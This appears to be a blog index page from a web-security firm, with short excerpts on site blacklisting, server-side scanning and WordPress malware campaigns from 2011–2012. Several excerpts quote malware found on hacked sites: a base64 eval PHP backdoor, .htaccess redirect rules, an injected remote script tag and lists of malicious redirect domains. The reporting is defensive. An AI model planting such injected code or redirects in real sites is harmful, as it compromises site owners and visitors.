Google recently put out a post talking to the past 5 years offering the Safe Browsing program and summarized in a post titled: Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately? This got us thinking about the number of Google warnings end-users see every day, and naturally we couldn’t help but take [...]
How To: Remove McAfee SiteAdvisor Blacklisting
June 14, 2012 by
As more and more blacklisting authorities come online it becomes important to understand how to go about submitting your site for a review. The most recent challenge has been figuring out how to go about getting a site off the McAfee SiteAdvisor solution. You can read more about what SiteAdvisor is here: http://www.siteadvisor.com/howitworks/index.html What’s really [...]
Introducing Server-Side Scanning
June 5, 2012 by
We’re excited to announce the release of a new feature to all clients – server-side scanning. Web-malware continues to evolve making it challenging to detect using only HTTP fingerprinting techniques, such as the ones SiteCheck is restricted to. As such we have been working to develop a new method of scanning that allows us to [...]
New Malware – Eval + GetMama + Encoded Javascript
March 15, 2012 by
We are seeing many WordPress sites on shared hosts getting compromised with an encoded javascript malware. It has multiple levels of obfuscation and that’s how it starts: 1- ALL PHP files with an eval (base64_decode line of code: /*god_mode_on*/eval (base64_decode("ZXZhbC hiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0 phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2 JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa.. 2- That long piece of code, once executed gets decoded to: if (!function_exists(GetMama)){function opanki ($buf){$god_mode = $_SERVER["good"]; [...]
New .htaccess attacks
January 19, 2012 by
Seeing some interesting modifications to the old style of .htaccess attacks. The attackers are using a lot of referer domains and using .in domains (along with the .ru). This is an example of the .htaccess hacked: RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista| msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos| search|metacrawler|bing|dogpile|facebook| twitter|blog|live|myspace|mail|yandex|rambler|ya|aport| linkedin|flickr|nigma|liveinternet|vkontakte| webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km| gigablast|entireweb|amfibi|dmoz|yippy|search| walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut| about|thunderstone|ixquick|terra|lookle| metaeureka|searchspot|slider|topseven|allthesites|libero| clickey|galaxy|brainysearch|pocketflier| verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot |acoon|cyber-content|devaro|fastbot|netzindex| abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv| suchbiene|suchmaschine|web-archiv|web| websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila| sfr|startpagina|kpnvandaag|ilse|wanadoo |telfort|hispavista|passagen|spray|eniro|telia|bluewin| [...]
New Malware – sweepstakesandcontestsnow.com
September 19, 2011 by
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with a malware from sweepstakesandcontestsnow.com. This is what is gets added to the hacked site: <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">.. And that code is used to infect the browser of the person visiting the compromised web site. What is interesting [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
September 13, 2011 by
We are often asked what were the top domains distributing malware or what threats we see more often on our security scanner. For the month of August, things were very similar to the previous ones, with a slightly increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability. If your site [...]
Malware update – Timthumb.php and .htaccess redirection
August 21, 2011 by
We have been very busy in our blog explaining about the latest TimThumb.php vulnerability and the affect it is having on WordPress web sites. If you missed the articles, please check here: TimThumb.php – Just the tip of the iceberg Attacks Against Timthumb.php in the Wild – List of Themes and Plugins Being Scanned [...]
More spam (via .htaccess) to search-box.in and malware from savebotstat.com
August 9, 2011 by
Very interesting .htaccess redirection to send traffic from Google and Yahoo image search to search-box.in. That’s what gets added to the hacked site: AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm (10:13:28 AM) kbc_: RewriteEngine On (10:13:29 AM) kbc_: RewriteOptions inherit (10:13:30 AM) kbc_: RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR] (10:13:31 AM) kbc_: RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [...]
.htaccess redirections to software-boss.ru and programmengineering.ru
August 8, 2011 by
Just an update to the .htaccess redirections attacks that we have been tracking for the last few days (most of them to .ru domains). Those are some of the domains being used right now: http://software-boss.ru/grammar/index.php additionalprofit.ru boss-united.ru clear-agent.ru clearagent.ru face-apple.ru fightagent.ru power-update.ru programmprofit.ru software-boss.ru syntaxswitch.ru window-switch.ru http://powerprogramm.ru/make/index.php http://jaobsofterty.ru/in.cgi?2 http://programmengineering.ru/check/index.php It is happening on [...]
